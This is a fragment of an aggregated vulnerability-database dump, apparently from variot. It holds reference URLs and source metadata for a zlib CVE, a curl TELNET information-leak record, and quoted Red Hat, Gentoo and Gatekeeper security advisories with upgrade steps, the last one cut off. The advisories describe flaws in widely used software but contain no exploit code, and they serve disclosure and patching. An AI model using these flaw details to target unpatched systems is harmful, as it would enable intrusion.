},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23825"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1852"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1016"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1048"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-30002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29581"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27950"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0168"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1055"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22844"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0924"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0909"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36946"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24448"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0562"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2639"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1355"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2586"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21499"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0854"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-20368"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0891"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26373"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36558"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0865"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1184"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2938"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2078"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23960"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36516"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28390"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3640"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25255"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0908"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-41974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/zlib"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42798"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht204641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32932"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42808"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32924"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42803"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42800"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32947"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213491."
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32940"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32944"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/registry/registry.access.redhat.com/repository/rh-sso-7/sso76-openshift-rhel8"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8964"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32149"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0908"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0909"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41912"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:9040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35949"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2238"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25858"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7276"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32742"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:7200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7201"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202210-42"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27664"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.10-4ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-6736-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-9840"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.13-1ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/klibc/2.0.7-1ubuntu5.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0215"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1281"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.1,
"url": "https://registry.centos.org/v2/\":"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:4053"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://issues.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32233"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4304"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0361"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2023:4052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169335",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169595",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170210",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169810",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170242",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169692",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169696",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169624",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "178074",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "173605",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"date": "2022-08-05T00:00:00",
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"date": "2022-08-28T19:12:00",
"db": "PACKETSTORM",
"id": "169335",
"ident": null
},
{
"date": "2022-10-31T14:53:38",
"db": "PACKETSTORM",
"id": "169595",
"ident": null
},
{
"date": "2022-12-13T17:16:20",
"db": "PACKETSTORM",
"id": "170210",
"ident": null
},
{
"date": "2022-11-10T13:48:32",
"db": "PACKETSTORM",
"id": "169810",
"ident": null
},
{
"date": "2022-12-15T15:34:35",
"db": "PACKETSTORM",
"id": "170242",
"ident": null
},
{
"date": "2022-11-02T15:00:46",
"db": "PACKETSTORM",
"id": "169692",
"ident": null
},
{
"date": "2022-11-02T15:01:31",
"db": "PACKETSTORM",
"id": "169696",
"ident": null
},
{
"date": "2022-11-01T13:31:28",
"db": "PACKETSTORM",
"id": "169624",
"ident": null
},
{
"date": "2022-12-08T16:34:22",
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"date": "2024-04-16T14:05:51",
"db": "PACKETSTORM",
"id": "178074",
"ident": null
},
{
"date": "2023-07-19T15:37:11",
"db": "PACKETSTORM",
"id": "173605",
"ident": null
},
{
"date": "2022-08-05T07:15:07.240000",
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-09T00:00:00",
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"date": "2022-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"date": "2025-05-30T20:15:30.030000",
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169624"
}
],
"trust": 0.2
},
"title": {
"_id": null,
"data": "Debian Security Advisory 5218-1",
"sources": [
{
"db": "PACKETSTORM",
"id": "169335"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 0.2
}
}
VAR-202108-2221
Vulnerability from variot - Updated: 2026-03-09 20:13 curl supports the -t command line option, known as CURLOPT_TELNETOPTIONS in libcurl. This rarely used option is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack-based buffer to the server, potentially revealing sensitive internal information to the server over a clear-text network protocol. This could happen because curl did not call and use sscanf() correctly when parsing the string provided by the application. cURL contains a use of uninitialized resources, through which information may be obtained. Summary:
An update is now available for OpenShift Logging 5.1. Solution:
For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html
For Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1944888 - CVE-2021-21409 netty: Request smuggling via content-length header
2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
-
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High
Title: curl: Multiple Vulnerabilities
Date: December 19, 2022
Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365
ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
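The resolution above is a version gate: builds of net-misc/curl below 7.86.0 are affected, 7.86.0 and later are not. A minimal Python sketch of that comparison follows; the sample installed-version string is hypothetical, and a real check would read the version from the package manager or `curl --version`.

```python
# Minimal sketch of the GLSA 202212-01 version gate for net-misc/curl:
# versions below 7.86.0 are affected, 7.86.0 and later are not.
# The sample version strings below are hypothetical.
def vtuple(version: str) -> tuple:
    """Turn a dotted version string into a comparable integer tuple."""
    return tuple(int(part) for part in version.split("."))

def affected(installed: str, fixed: str = "7.86.0") -> bool:
    """True if the installed version predates the first fixed release."""
    return vtuple(installed) < vtuple(fixed)

print(affected("7.85.0"))  # True: older than the fix
print(affected("7.86.0"))  # False: first fixed release
```

Tuple comparison is used instead of string comparison so that, for example, "7.9.0" sorts below "7.86.0" correctly.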
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922
[ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923
[ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925
[ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926
[ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945
[ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946
[ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947
[ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576
[ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774
[ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775
[ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776
[ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779
[ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780
[ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781
[ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782
[ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115
[ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205
[ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206
[ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207
[ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208
[ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221
[ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252
[ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260
[ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915
[ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . Description:
Gatekeeper Operator v0.2
Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.
This advisory contains the container images for Gatekeeper that include security updates, and container upgrades. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.
Security updates:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation:
-
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy has installPlanApproval set to Automatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for installPlanApproval to manual, then you must view each cluster to manually approve the upgrade to the operator.
-
